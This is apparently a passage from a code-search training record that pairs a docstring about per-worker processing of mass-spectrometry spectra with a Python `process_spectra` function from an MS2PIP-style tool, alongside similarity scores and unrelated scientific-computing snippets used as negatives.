"def predict(self, smiles_list):\n data = list(enumerate(smiles_list))\n num_data = len(data)\n num_sub_proc = min(self.num_sub_proc, num_data)\n\n q1 = Queue()\n manager = Manager()\n return_dict = manager.dict()\n proc_master = Process(target=self.creator,\n args=(q1, data, num_sub_proc))\n proc_master.start()\n\n # create slave process\n procs = []\n for sub_id in range(0, num_sub_proc):\n proc = Process(target=self.worker, args=(q1, return_dict))\n procs.append(proc)\n proc.start()\n\n q1.close()\n q1.join_thread()\n proc_master.join()\n for proc in procs:\n proc.join()\n keys = sorted(return_dict.keys())\n\n result_dict = dict()\n docking_score_list = list()\n if self.rescoring:\n docking_re_list = list()\n\n for key in range(num_data):\n if key in keys:\n result_dict0 = return_dict[key]\n if 'docking' in result_dict0:\n docking_score = result_dict0['docking']\n else:\n docking_score = np.array([99.999], dtype=np.float32)\n\n if self.rescoring:\n if 'docking_re' in result_dict0:\n docking_re = result_dict0['docking_re']\n else:\n docking_re = np.array([99.999], dtype=np.float32)\n\n else:\n docking_score = np.array([99.999], dtype=np.float32)\n if self.rescoring:\n docking_re = np.array([99.999], dtype=np.float32)\n\n docking_score_list += [docking_score]\n if self.rescoring:\n docking_re_list += [docking_re]\n\n result_dict['docking'] = docking_score_list\n if self.rescoring:\n result_dict['docking_re'] = docking_re_list\n\n if self.use_my_module:\n self.my_class.predict(self, smiles_list, result_dict, return_dict)\n\n return result_dict",
"def prepare(self, n_cores=1, ipp_client=None):\n if len(self.shape_parameters):\n self.morpher = MORPHERS[self.config['morpher']](self.config.get('morpher_config', {}),\n self.shape_parameters)\n zs_list = self.morpher.get_anchor_points(bounds=self.get_bounds())\n\n # Create the configs for each new model\n configs = []\n for zs in zs_list:\n config = deepcopy(self.pdf_base_config)\n for i, (setting_name, (anchors, _, _)) in enumerate(self.shape_parameters.items()):\n # Translate from zs to settings using the anchors dict. Maybe not all settings are numerical.\n config[setting_name] = anchors[zs[i]]\n if ipp_client is None and n_cores != 1:\n # We have to compute in parallel: must have delayed computation on\n config['delay_pdf_computation'] = True\n configs.append(config)\n\n # Create the new models\n if n_cores == 1:\n models = [Model(c) for c in tqdm(configs, desc=\"Computing/loading models on one core\")]\n\n elif ipp_client is not None:\n models = create_models_ipyparallel(configs, ipp_client,\n block=self.config.get('block_during_paralellization', False))\n\n else:\n models = [Model(c) for c in tqdm(configs, desc=\"Preparing model computation tasks\")]\n\n hashes = set()\n for m in models:\n for s in m.sources:\n hashes.add(s.hash)\n\n compute_many(hashes, n_cores)\n\n # Reload models so computation takes effect\n models = [Model(c) for c in tqdm(configs, desc=\"Loading computed models\")]\n\n # Add the new models to the anchor_models dict\n for zs, model in zip(zs_list, models):\n self.anchor_models[tuple(zs)] = model\n\n # Build the interpolator for the rates of each source.\n self.mus_interpolator = self.morpher.make_interpolator(f=lambda m: m.expected_events(),\n extra_dims=[len(self.source_name_list)],\n anchor_models=self.anchor_models)\n\n self.is_data_set = False\n self.is_prepared = True",
"def predictManyIpdFuncModel(self, refId):\n\n # Materialized the numpy wrapper around the shared data\n snipFunction = self.snippetFunc(refId, self.post, self.pre)\n\n def fMany(sites):\n contexts = [snipFunction(x[0], x[1]) for x in sites]\n return self.gbmModel.getPredictions(contexts)\n\n return fMany",
"def eval(self):\r\n if WORDSPLIT:\r\n train, test = self.get_train_test_wordsplit()\r\n elif UTTERANCE_SPLIT:\r\n train, test, val = self.get_train_test_utterance_split()\r\n wordlist = joblib.load('wordlist.pkl')\r\n dictionary = joblib.load('dict.pkl')\r\n phones = joblib.load('phones.pkl')\r\n metadata_help = {'wordlist': wordlist, 'dictionary': dictionary, 'phones': phones}\r\n p2c = utils.phone2class(phones)\r\n c2p = utils.class2phone(phones)\r\n \"\"\"Get test generator\"\"\"\r\n test_data = Dataset({'files': test, 'mode': 'eval', 'metadata_help': metadata_help})\r\n test_gen = data.DataLoader(test_data, batch_size=1,\r\n shuffle=True, collate_fn=test_data.collate_eval, drop_last=True)\r\n for batch_number, features in tqdm(enumerate(test_gen)):\r\n spectrograms = features['spectrograms']\r\n phones = features['phones']\r\n batch_metadata = features['metadata'][0]\r\n self.G = self.G.eval()\r\n\r\n outputs = self.G(spectrograms)\r\n outputs = np.squeeze(outputs.detach().cpu().numpy())\r\n phones = np.squeeze(phones.detach().cpu().numpy())\r\n phones = phones.astype(dtype=int)\r\n phones = [c2p[x] for x in phones]\r\n\r\n output_classes = np.argmax(outputs, axis=1)\r\n\r\n \"\"\"Decode the output predictions into a phone sequence\"\"\"\r\n # https://stackoverflow.com/questions/38065898/how-to-remove-the-adjacent-duplicate-value-in-a-numpy-array\r\n duplicates_eliminated = np.asarray([k for k, g in groupby(output_classes)])\r\n blanks_eliminated = duplicates_eliminated[duplicates_eliminated != 0]\r\n predicted_phones_ = [c2p[x] for x in blanks_eliminated]\r\n \"\"\"remove SOS and EOS\"\"\"\r\n predicted_phones = []\r\n for x in predicted_phones_:\r\n if x != 'SOS' and x != 'EOS':\r\n predicted_phones.append(x)\r\n\r\n data_to_save = {'speaker': batch_metadata['speaker'],\r\n 'word': batch_metadata['word'],\r\n 'true_phones': batch_metadata['phones'],\r\n 'predicted_phones': predicted_phones}\r\n dump_path = os.path.join(self.predict_dir, batch_metadata['utterance'] + '.pkl')\r\n joblib.dump(data_to_save, dump_path)",
"def worker(nums, outdict):\n print(threading.current_thread().name)\n print (\"pid:\", os.getpid())\n for n in nums:\n outdict[n] = factorize_naive(n)",
"def setup_all_data_for_predict(self, roi, contrast, run_type='WMM', postFix=['mcf','sgtf']):\n\t\tself.hdf5_filename = os.path.join(self.conditionFolder(stage = 'processed/mri', run = self.runList[self.conditionDict[run_type][0]]), run_type + '.hdf5')\n\t\th5file = openFile(self.hdf5_filename, mode = 'r+', title = run_type + \" file\")\t\n\t\t\n\t\t# Load all functional data (per run) and load all combined data:\n\t\troi_dict = {}\n\t\troi_data_per_roi = []\n\t\tmask_data_per_roi = []\n\n\t\tfor j in range(len(roi)):\n\t\t\tpatch = 1\n\t\t\tmask_data = []\n\t\t\tcontrast_dict = {}\n\t\t\tcombined_dict = {}\n\t\t\troi_data_PFR = self.roi_data_from_hdf(h5file, roi_wildcard = roi[j], data_type = 'PRF_coef', combined = True).squeeze()\n\t\t\tfor contr_nr in range(1,25): # 24 relevant contrasts; 12 patches vs baseline \\ 12 patches vs stimulation\n\t\t\t\troi_data_runs = []\n\t\t\t\troi_data_comb = []\n\t\t\t\tfor r in [self.runList[i] for i in self.conditionDict[run_type]]:\n\t\t\t\t\tif roi_data_runs == []:\n\t\t\t\t\t\troi_data_comb.append(self.roi_data_from_hdf(h5file, roi_wildcard = roi[j], data_type = contrast + str(contr_nr), combined = True).squeeze())\n\t\t\t\t\troi_data_runs.append(self.roi_data_from_hdf(h5file, roi[j], contrast + str(contr_nr), run = r).squeeze()) # squeeze()\n\t\t\t\t\t\n\t\t\t\t\n\t\t\t\tif contr_nr % 2 == 1:\n\t\t\t\t\tcontrast_dict.update({'base_con' + str(patch) : np.hstack(roi_data_runs)})\n\t\t\t\t\tcontrast_dict.update({'base_con_comb' + str(patch) : np.hstack(roi_data_comb)})\n\t\t\t\telif contr_nr % 2 == 0:\n\t\t\t\t\tcontrast_dict.update({'stim_con' + str(patch) : np.hstack(roi_data_runs)})\n\t\t\t\t\tcontrast_dict.update({'stim_con_comb' + str(patch) : np.hstack(roi_data_comb)})\n\t\t\t\t\tpatch += 1\n\t\t\t\tif contr_nr == 24:\n\t\t\t\t\tcontrast_dict.update({'PRF_coef': roi_data_PFR})\n\t\t\t\t\t\n\n\t\t\troi_dict.update({roi[j]:contrast_dict})\t\n\t\t\n\t\treturn roi_dict",
"def mite_2m(train_df, test_df, features, outcome, treatment, exposure, clf_t, clf_c, clf_er):\n np.random.seed(0)\n\n train_exposed_df, train_not_exposed_df = split_treatment_control(train_df, exposure)\n train_t_df, _ = split_treatment_control(train_df, treatment)\n\n clf_t_trained = clf_t.fit(train_exposed_df[features], train_exposed_df[outcome])\n clf_c_trained = clf_c.fit(train_not_exposed_df[features], train_not_exposed_df[outcome])\n clf_er_trained = clf_er.fit(train_t_df[features], train_t_df[exposure])\n\n test_f_df = test_df[features]\n return clf_er_trained.predict_proba(test_f_df)[:, 1] * \\\n (clf_t_trained.predict_proba(test_f_df)[:, 1] - clf_c_trained.predict_proba(test_f_df)[:, 1])",
"def reproduce_paper():\n dirname = os.path.join(DATADIR, 'ptn_runs')\n tdatlst_f3 = [multiple_pandas_to_teacher_data(dirname)]\n tdatlst_f2 = [multiple_pandas_to_teacher_data(dirname, remove_f3=True)]\n\n target_f3, labels = ids.gen_model(f3=True)\n target_f2, _ = ids.gen_model(f3=False)\n\n # Phoneme models and samples\n # --------------------------\n plt.figure(tight_layout=True, facecolor='white', figsize=(9.5, 6.34,))\n sns.set(rc={'axes.facecolor': '#bbbbbb', 'grid.color': '#aaaaaa'})\n\n plt.subplot2grid((2, 3), (0, 0), rowspan=2, colspan=2)\n plt.title('A')\n ids.plot_phoneme_models(tdatlst_f3[0], target_f3, labels,\n formants=[0, 1], nstd=2,\n legend=True, grayscale=True)\n plt.subplot2grid((2, 3), (0, 2))\n plt.title('B')\n ids.plot_phoneme_models(tdatlst_f3[0], target_f3, labels, formants=[1, 2],\n nstd=2, grayscale=True)\n plt.subplot2grid((2, 3), (1, 2))\n plt.title('C')\n ids.plot_phoneme_models(tdatlst_f3[0], target_f3, labels, formants=[0, 2],\n nstd=2, grayscale=True)\n\n plt.savefig('fig-1.png', dpi=300)\n\n # Articulation\n # ------------\n sns.set(rc={'axes.facecolor': '#e8e8e8', 'grid.color': '#ffffff'})\n f = plt.figure(tight_layout=True, facecolor='white', figsize=(9.5, 4.75,))\n\n ax1 = f.add_subplot(2, 1, 1)\n plt.title('A')\n indices = ids.plot_phoneme_articulation(tdatlst_f3, target_f3, labels,\n ax=ax1)\n ax2 = f.add_subplot(2, 1, 2)\n plt.title('B')\n ids.plot_phoneme_articulation(tdatlst_f2, target_f2, labels, ax=ax2,\n indices=indices)\n ax2.set_ylim(ax1.get_ylim())\n\n plt.savefig('fig-2.png', dpi=300)\n\n # Variation (F1, F2, F3)\n # ---------------------\n plt.figure(tight_layout=True, facecolor='white', figsize=(9.5, 3.5,))\n sns.set(rc={'axes.facecolor': '#e8e8e8'})\n ids.plot_phoneme_variation(tdatlst_f3, target_f3, labels)\n plt.savefig('fig-3.png', dpi=300)\n\n # ARI for different learning algorithms\n ari_file_f3 = os.path.join(DATADIR, 'omnirunf3.pkl')\n ari_file_f2 = os.path.join(DATADIR, '2FLearning_500ex.pkl')\n ari_ylabels = [\"ARI (F1, F2, F3)\", \"ARI (F1, F2)\"]\n sns.set(rc={'axes.facecolor': '#cccccc', 'grid.color': '#bbbbbb'})\n plot_compare([ari_file_f3, ari_file_f2], [500, 500], ari_ylabels,\n grayscale=True)\n plt.savefig('fig-4.png', dpi=300)\n\n # DPGMM ARI as a funciton of the number of samples\n # ------------------------------------------------\n f = plt.figure(tight_layout=True, facecolor='white', figsize=(7.5, 3.5,))\n sns.set(rc={'axes.facecolor': '#eeeeee', 'grid.color': '#d8d8d8'})\n ari_over_time_violin()\n plt.savefig('fig-5.png', dpi=300)",
"def __get_raw_prediction(self, chunk_info_list, patch_info_list):\n # 1 dedicated thread just to write results back to disk\n proc_pool = Pool(processes=1)\n wsi_pred_map_mmap_path = \"%s/pred_map.npy\" % self.cache_path\n\n masking = lambda x, a, b: (a <= x) & (x <= b)\n for idx in range(0, chunk_info_list.shape[0]):\n chunk_info = chunk_info_list[idx]\n # select patch basing on top left coordinate of input\n start_coord = chunk_info[0, 0]\n end_coord = chunk_info[0, 1] - self.patch_input_shape\n selection = masking(\n patch_info_list[:, 0, 0, 0], start_coord[0], end_coord[0]\n ) & masking(patch_info_list[:, 0, 0, 1], start_coord[1], end_coord[1])\n chunk_patch_info_list = np.array(\n patch_info_list[selection]\n ) # * do we need copy ?\n\n # further select only the patches within the provided mask\n chunk_patch_info_list = self.__select_valid_patches(chunk_patch_info_list)\n\n # there no valid patches, so flush 0 and skip\n if chunk_patch_info_list.shape[0] == 0:\n proc_pool.apply_async(\n _assemble_and_flush, args=(wsi_pred_map_mmap_path, chunk_info, None)\n )\n continue\n\n # shift the coordinare from wrt slide to wrt chunk\n chunk_patch_info_list -= chunk_info[:, 0]\n chunk_data = self.wsi_handler.read_region(\n chunk_info[0][0][::-1], (chunk_info[0][1] - chunk_info[0][0])[::-1]\n )\n chunk_data = np.array(chunk_data)[..., :3]\n np.save(\"%s/cache_chunk.npy\" % self.cache_path, chunk_data)\n\n pbar_desc = \"Process Chunk %d/%d\" % (idx, chunk_info_list.shape[0])\n patch_output_list = self.__run_model(\n chunk_patch_info_list[:, 0, 0], pbar_desc\n )\n\n proc_pool.apply_async(\n _assemble_and_flush,\n args=(wsi_pred_map_mmap_path, chunk_info, patch_output_list),\n )\n proc_pool.close()\n proc_pool.join()\n return",
"def computeSoftwareMLModels(df,data_label,roi_cols,covar_continuous_cols,covar_cat_cols,outcome_col,group_col,model_type,ml_model,rank_features=False,compute_null=False,n_splits=10,n_repeats=10,n_jobs=1):\n software_list = df[data_label].unique()\n print('Running ML classifer on {} {}'.format(len(software_list),data_label))\n scores_concat_df = pd.DataFrame()\n feature_rank_concat_df = pd.DataFrame()\n external_scores_concat_df = pd.DataFrame()\n\n perf_pval_dict = {}\n for pipe in software_list:\n ml_df = df[df[data_label]==pipe]\n print('{} {}'.format(data_label, pipe))\n\n #cross_val_score\n scores_df, null_df, pvalue, feature_rank_df = getMLModelPerf(ml_df,roi_cols,covar_continuous_cols,covar_cat_cols,outcome_col,model_type,ml_model,rank_features,compute_null,n_splits,n_repeats,n_jobs) \n scores_df[data_label] = np.tile(pipe,len(scores_df))\n scores_concat_df = scores_concat_df.append(scores_df)\n \n if compute_null:\n null_df[data_label] = np.tile('null',len(null_df))\n scores_concat_df = scores_concat_df.append(null_df)\n perf_pval_dict[pipe] = pvalue\n\n # RFECV\n if rank_features:\n feature_rank_df[data_label] = np.tile(pipe,len(feature_rank_df))\n feature_rank_concat_df = feature_rank_concat_df.append(feature_rank_df)\n\n # explicit CV for internal vs external perfomance\n if group_col:\n external_scores_df = getIndependentTestSetPerf(ml_df,roi_cols,covar_continuous_cols,covar_cat_cols,outcome_col,group_col,model_type,ml_model)\n external_scores_df[data_label] = np.tile(pipe,len(external_scores_df))\n external_scores_concat_df = external_scores_concat_df.append(external_scores_df) \n\n return scores_concat_df, perf_pval_dict, feature_rank_concat_df, external_scores_concat_df",
"def _doMap(self, func, iterable):\n name = \"Mapper\"\n sys.stderr.write(\"Master[%s phase]: starting\\n\" % name)\n pipes = [mp.Pipe() for _ in range(self.num_workers)]\n proc = [mp.Process(target=spawn_mapper(func), name=name, args=(q,)) for q in pipes]\n for p in proc:\n p.daemon = True\n p.start()\n for output_p, input_p in pipes:\n input_p.close() # we don't need to read from the pipes\n qi = 0\n for item in iterable:\n pipes[qi][0].send(item)\n qi = (qi+1) % self.num_workers\n for q,_ in pipes:\n q.send(None) # add termination tokens\n q.close()\n for p in proc:\n p.join()\n sys.stderr.write(\"Master[%s phase]: ended..\\n\" % name)"
] |
[
"0.6704002",
"0.5983211",
"0.57653445",
"0.5711574",
"0.55658346",
"0.5487981",
"0.5443622",
"0.54285884",
"0.5412592",
"0.5407846",
"0.5374122",
"0.536485",
"0.536106",
"0.5355468",
"0.531436",
"0.5283513",
"0.5281439",
"0.52793396",
"0.52458423",
"0.5241992",
"0.5230075",
"0.52263445",
"0.52141356",
"0.5212488",
"0.52068275",
"0.51946336",
"0.5190377",
"0.5187453",
"0.5179245",
"0.51613593"
] |
0.7113193
|
0
|
Function for each worker to process a list of spectra. Each spectrum is read from the MGF file and matched to its peptide sequence from the input peptide table; the fragmentation model is chosen based on `model`. PTMmap, Ntermmap and Ctermmap determine the modifications applied to each peptide sequence, and the fragment ion intensities are predicted. Either the feature vectors or a DataFrame with the predicted and empirical intensities is then returned.
|
def process_spectra(
worker_num,
data,
spec_file,
vector_file,
afile,
modfile,
modfile2,
PTMmap,
model,
fragerror,
spectrum_id_pattern,
):
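    # Initialize the C extension with the amino acid mass file and the
    # (s)PTM modification files prepared by the main process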
ms2pip_pyx.ms2pip_init(afile, modfile, modfile2)
model_id = MODELS[model]["id"]
peaks_version = MODELS[model]["peaks_version"]
# transform pandas data structure into dictionary for easy access
if "ce" in data.columns:
specdict = (
data[["spec_id", "peptide", "modifications", "ce"]]
.set_index("spec_id")
.to_dict()
)
ces = specdict["ce"]
else:
specdict = (
data[["spec_id", "peptide", "modifications", "charge"]].set_index("spec_id").to_dict()
)
peptides = specdict["peptide"]
modifications = specdict["modifications"]
charges = specdict["charge"]
# cols contains the names of the computed features
cols_n = get_feature_names_new()
if "ce" in data.columns:
cols_n.append("ce")
# cols_n = get_feature_names_catboost()
    # Buffers used when feature vectors are requested (vector_file mode)
dvectors = []
dtargets = dict()
psmids = []
    # Buffers used when predictions (and targets) are returned
pepid_buf = []
peplen_buf = []
charge_buf = []
mz_buf = []
target_buf = []
prediction_buf = []
vector_buf = []
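    # Compile the regex that extracts the spectrum ID from each MGF title so it
    # can be matched against the `spec_id` values of the input peptides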
spectrum_id_regex = re.compile(spectrum_id_pattern)
# Track progress for only one worker (good approximation of all workers' progress)
for spectrum in track(
read_spectrum_file(spec_file),
total=len(peptides),
disable=worker_num != 0,
transient=True,
description="",
):
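        # For each spectrum: resolve its ID, look up the matching peptide,
        # apply the modifications, preprocess the peaks, then either collect
        # feature vectors and targets or compute intensity predictions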
# Match title with regex
match = spectrum_id_regex.search(spectrum.title)
try:
title = match[1]
except (TypeError, IndexError):
raise TitlePatternError(
"Spectrum title pattern could not be matched to spectrum IDs "
f"`{spectrum.title}`. "
" Are you sure that the regex contains a capturing group?"
)
if title not in peptides:
continue
peptide = peptides[title]
peptide = peptide.replace("L", "I")
mods = modifications[title]
if spectrum.precursor_charge:
charge = spectrum.precursor_charge
else:
charge = charges[title] # If charge cannot be parsed from MGF
if "mut" in mods:
continue
        # Peptides longer than 100 residues lead to "Segmentation fault (core dumped)"
if len(peptide) > 100:
continue
# convert peptide string to integer list to speed up C code
peptide = np.array(
[0] + [AMINO_ACID_IDS[x] for x in peptide] + [0], dtype=np.uint16
)
try:
modpeptide = apply_mods(peptide, mods, PTMmap)
except UnknownModificationError as e:
logger.warn("Unknown modification: %s", e)
continue
# Spectrum preprocessing:
        # Remove reporter ions and precursor peak, normalize, transform
for label_type in ["iTRAQ", "TMT"]:
if label_type in model:
spectrum.remove_reporter_ions("iTRAQ")
# spectrum.remove_precursor()
spectrum.tic_norm()
spectrum.log2_transform()
# TODO: Check if 30 is good default CE!
# RG: removed `if ce == 0` in get_vector, split up into two functions
colen = 30
if "ce" in data.columns:
try:
colen = int(float(ces[title]))
            except (TypeError, ValueError):
                logger.warning("Could not parse collision energy!")
continue
if vector_file:
# get targets
targets = ms2pip_pyx.get_targets(
modpeptide,
spectrum.msms,
spectrum.peaks,
float(fragerror),
peaks_version,
)
psmids.extend([title] * (len(targets[0])))
if "ce" in data.columns:
dvectors.append(
np.array(
ms2pip_pyx.get_vector_ce(
peptide, modpeptide, charge, colen
),
dtype=np.uint16,
)
) # SD: added collision energy
else:
dvectors.append(
np.array(
ms2pip_pyx.get_vector(peptide, modpeptide, charge),
dtype=np.uint16,
)
)
# Collecting targets to dict; works for variable number of ion types
# For C-term ion types (y, y++, z), flip the order of targets,
# for correct order in vectors DataFrame
for i, t in enumerate(targets):
if i in dtargets.keys():
if i % 2 == 0:
dtargets[i].extend(t)
else:
dtargets[i].extend(t[::-1])
else:
if i % 2 == 0:
dtargets[i] = [t]
else:
dtargets[i] = [t[::-1]]
else:
# Predict the b- and y-ion intensities from the peptide
pepid_buf.append(title)
peplen_buf.append(len(peptide) - 2)
charge_buf.append(charge)
# get/append ion mzs, targets and predictions
targets = ms2pip_pyx.get_targets(
modpeptide,
spectrum.msms,
spectrum.peaks,
float(fragerror),
peaks_version,
)
target_buf.append([np.array(t, dtype=np.float32) for t in targets])
mzs = ms2pip_pyx.get_mzs(modpeptide, peaks_version)
mz_buf.append([np.array(m, dtype=np.float32) for m in mzs])
# If using xgboost model file, get feature vectors to predict outside of MP.
# Predictions will be added in `_merge_predictions` function.
if "xgboost_model_files" in MODELS[model].keys():
vector_buf.append(
np.array(
ms2pip_pyx.get_vector(peptide, modpeptide, charge),
dtype=np.uint16,
)
)
else:
predictions = ms2pip_pyx.get_predictions(
peptide, modpeptide, charge, model_id, peaks_version, colen
)
prediction_buf.append(
[np.array(p, dtype=np.float32) for p in predictions]
)
# If feature vectors requested, return specific data
if vector_file:
        if dvectors:
            # Concatenate dvectors into a 2D ndarray before making the DataFrame
            # to reduce memory usage
            dvectors = np.concatenate(dvectors)
            df = pd.DataFrame(dvectors, dtype=np.uint16, copy=False)
            df.columns = df.columns.astype(str)
        else:
            # If num_cpu > number of spectra, dvectors can be empty
            df = pd.DataFrame()
return psmids, df, dtargets
# Else, return general data
return (
pepid_buf,
peplen_buf,
charge_buf,
mz_buf,
target_buf,
prediction_buf,
vector_buf,
)
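A minimal usage sketch, not part of the original module: it shows one way a driver could fan `process_spectra` out over a `multiprocessing.Pool`, splitting the input peptide table into one contiguous chunk per worker. The names `run_workers`, `psm_data`, `config` and `n_workers` (and the `config` keys) are hypothetical placeholders; the actual pipeline dispatches its workers through its own `_execute_in_pool` helper instead.

import multiprocessing


def run_workers(psm_data, spec_file, config, n_workers=4):
    # Split the peptide table (a pandas DataFrame) into contiguous row chunks,
    # one per worker. Hypothetical driver code; names are placeholders.
    n = len(psm_data)
    bounds = [round(i * n / n_workers) for i in range(n_workers + 1)]
    chunks = [psm_data.iloc[bounds[i]:bounds[i + 1]] for i in range(n_workers)]

    args = [
        (
            worker_num,
            chunk,
            spec_file,
            None,  # vector_file: None selects the predictions-and-targets mode
            config["afile"],
            config["modfile"],
            config["modfile2"],
            config["ptm_map"],
            config["model"],
            config["fragerror"],
            config["spectrum_id_pattern"],
        )
        for worker_num, chunk in enumerate(chunks)
    ]

    with multiprocessing.Pool(n_workers) as pool:
        # Each worker returns (pepid_buf, peplen_buf, charge_buf, mz_buf,
        # target_buf, prediction_buf, vector_buf)
        return pool.starmap(process_spectra, args)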
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def process_peptides(worker_num, data, afile, modfile, modfile2, PTMmap, model):\n\n ms2pip_pyx.ms2pip_init(afile, modfile, modfile2)\n\n # Prepare output variables\n pepid_buf = []\n peplen_buf = []\n charge_buf = []\n mz_buf = []\n target_buf = None\n prediction_buf = []\n vector_buf = []\n\n # transform pandas dataframe into dictionary for easy access\n if \"ce\" in data.columns:\n specdict = (\n data[[\"spec_id\", \"peptide\", \"modifications\", \"charge\", \"ce\"]]\n .set_index(\"spec_id\")\n .to_dict()\n )\n ces = specdict[\"ce\"]\n else:\n specdict = (\n data[[\"spec_id\", \"peptide\", \"modifications\", \"charge\"]]\n .set_index(\"spec_id\")\n .to_dict()\n )\n pepids = data[\"spec_id\"].tolist()\n peptides = specdict[\"peptide\"]\n modifications = specdict[\"modifications\"]\n charges = specdict[\"charge\"]\n del specdict\n\n # Track progress for only one worker (good approximation of all workers' progress)\n for pepid in track(\n pepids,\n total=len(pepids),\n disable=worker_num != 0,\n transient=True,\n description=\"\",\n ):\n peptide = peptides[pepid]\n peptide = peptide.replace(\"L\", \"I\")\n mods = modifications[pepid]\n\n # TODO: Check if 30 is good default CE!\n colen = 30\n if \"ce\" in data.columns:\n colen = ces[pepid]\n\n # Peptides longer then 101 lead to \"Segmentation fault (core dumped)\"\n if len(peptide) > 100:\n continue\n\n # convert peptide string to integer list to speed up C code\n peptide = np.array(\n [0] + [AMINO_ACID_IDS[x] for x in peptide] + [0], dtype=np.uint16\n )\n modpeptide = apply_mods(peptide, mods, PTMmap)\n\n pepid_buf.append(pepid)\n peplen = len(peptide) - 2\n peplen_buf.append(peplen)\n\n ch = charges[pepid]\n charge_buf.append(ch)\n\n model_id = MODELS[model][\"id\"]\n peaks_version = MODELS[model][\"peaks_version\"]\n\n # get ion mzs\n mzs = ms2pip_pyx.get_mzs(modpeptide, peaks_version)\n mz_buf.append([np.array(m, dtype=np.float32) for m in mzs])\n\n # If using xgboost model file, get feature vectors to predict outside of MP.\n # Predictions will be added in `_merge_predictions` function.\n if \"xgboost_model_files\" in MODELS[model].keys():\n vector_buf.append(\n np.array(\n ms2pip_pyx.get_vector(peptide, modpeptide, ch),\n dtype=np.uint16,\n )\n )\n else:\n predictions = ms2pip_pyx.get_predictions(\n peptide, modpeptide, ch, model_id, peaks_version, colen\n )\n prediction_buf.append([np.array(p, dtype=np.float32) for p in predictions])\n\n return (\n pepid_buf,\n peplen_buf,\n charge_buf,\n mz_buf,\n target_buf,\n prediction_buf,\n vector_buf,\n )",
"def run(self):\n\n # TODO: MOVE TO INIT?\n self.afile = write_amino_acid_masses()\n self.modfile = self.mods.write_modifications_file(mod_type=\"ptm\")\n self.modfile2 = self.mods.write_modifications_file(mod_type=\"sptm\")\n #\n\n self._read_peptide_information()\n\n if self.add_retention_time:\n logger.info(\"Adding retention time predictions\")\n rt_predictor = RetentionTime(config=self.params, num_cpu=self.num_cpu)\n rt_predictor.add_rt_predictions(self.data)\n\n # Spectrum file mode\n if self.spec_file:\n logger.info(\"Processing spectra and peptides...\")\n results = self._process_spectra()\n # Feature vectors requested\n if self.vector_file:\n self._write_vector_file(results)\n # Predictions (and targets) requested\n else:\n logger.debug(\"Merging results\")\n all_preds = self._merge_predictions(results)\n # Correlations also requested\n if self.compute_correlations:\n logger.info(\"Computing correlations\")\n correlations = calc_correlations.calc_correlations(all_preds)\n logger.info(\n \"Median correlations: \\n%s\",\n str(correlations.groupby(\"ion\")[\"pearsonr\"].median()),\n )\n if not self.return_results:\n corr_filename = self.output_filename + \"_correlations.csv\"\n logger.info(f\"Writing file {corr_filename}\")\n try:\n correlations.to_csv(\n corr_filename,\n index=True,\n lineterminator=\"\\n\",\n )\n except TypeError: # Pandas < 1.5 (Required for Python 3.7 support)\n correlations.to_csv(\n corr_filename,\n index=True,\n line_terminator=\"\\n\",\n )\n else:\n return correlations\n if not self.return_results:\n pae_filename = self.output_filename + \"_pred_and_emp.csv\"\n logger.info(f\"Writing file {pae_filename}...\")\n try:\n all_preds.to_csv(\n pae_filename,\n index=False,\n lineterminator=\"\\n\",\n )\n except TypeError: # Pandas < 1.5 (Required for Python 3.7 support)\n all_preds.to_csv(\n pae_filename,\n index=False,\n line_terminator=\"\\n\",\n )\n else:\n return all_preds\n\n # Match spectra mode\n elif self.match_spectra:\n results = self._process_peptides()\n matched_spectra = self._match_spectra(results)\n self._write_matched_spectra(matched_spectra)\n\n # Predictions-only mode\n else:\n logger.info(\"Processing peptides...\")\n results = self._process_peptides()\n\n logger.debug(\"Merging results ...\")\n all_preds = self._merge_predictions(results)\n\n if not self.return_results:\n self._write_predictions(all_preds)\n else:\n return all_preds",
"def modelfactors(trace_files: List[str], trace_processes: Dict):\n traces = [load(file) for file in trace_files]\n df_mfactors = pd.DataFrame(columns=MOD_FACTORS_DOC.values())\n reference = True\n for (hdf5_file, trace, cpus) in zip(trace_files, traces, trace_processes.values()):\n MOD_FACTORS_VAL['num_processes'] = cpus\n print(\n f\"==INFO== Analysing {hdf5_file} ({MOD_FACTORS_VAL['num_processes']} processes, {human_readable(os.path.getsize(hdf5_file))})\")\n\n # Computes raw data\n ipc, freq, runtime, runtime_id, useful_av, useful_max, useful_tot, useful_id, useful_inst, useful_cyc = get_raw_data(\n trace, cmdl_args)\n\n MOD_FACTORS_VAL['ipc'] = ipc\n MOD_FACTORS_VAL['freq'] = freq\n MOD_FACTORS_VAL['runtime'] = runtime\n MOD_FACTORS_VAL['runtime_id'] = runtime_id\n MOD_FACTORS_VAL['useful_av'] = useful_av\n MOD_FACTORS_VAL['useful_max'] = useful_max\n MOD_FACTORS_VAL['useful_tot'] = useful_tot\n MOD_FACTORS_VAL['useful_id'] = useful_id\n MOD_FACTORS_VAL['useful_ins'] = useful_inst\n MOD_FACTORS_VAL['useful_cyc'] = useful_cyc\n\n # Computes efficiencies after getting the raw data\n parallel_eff, load_balance, comm_eff, serial_eff, transfer_eff = get_efficiencies(\n MOD_FACTORS_VAL['runtime'],\n MOD_FACTORS_VAL['runtime_id'],\n MOD_FACTORS_VAL['useful_av'],\n MOD_FACTORS_VAL['useful_max'],\n MOD_FACTORS_VAL['useful_id'],\n MOD_FACTORS_VAL['comp_scale'])\n\n MOD_FACTORS_VAL['parallel_eff'] = parallel_eff\n MOD_FACTORS_VAL['load_balance'] = load_balance\n MOD_FACTORS_VAL['comm_eff'] = comm_eff\n MOD_FACTORS_VAL['serial_eff'] = serial_eff\n MOD_FACTORS_VAL['transfer_eff'] = transfer_eff\n\n # Adds the new row with the raw data and efficiencies to the dataframe\n df_mfactors.loc[len(df_mfactors), :] = list(MOD_FACTORS_VAL.values())\n\n # Computes scalabilities\n df_mfactors = get_scalabilities(df_mfactors, cmdl_args)\n\n return df_mfactors",
"def _process_spectra(self):\n titles = self.data[\"spec_id\"].to_list()\n\n return self._execute_in_pool(\n titles,\n process_spectra,\n (\n self.spec_file,\n self.vector_file,\n self.afile,\n self.modfile,\n self.modfile2,\n self.mods.ptm_ids,\n self.model,\n self.fragerror,\n self.spectrum_id_pattern,\n ),\n )",
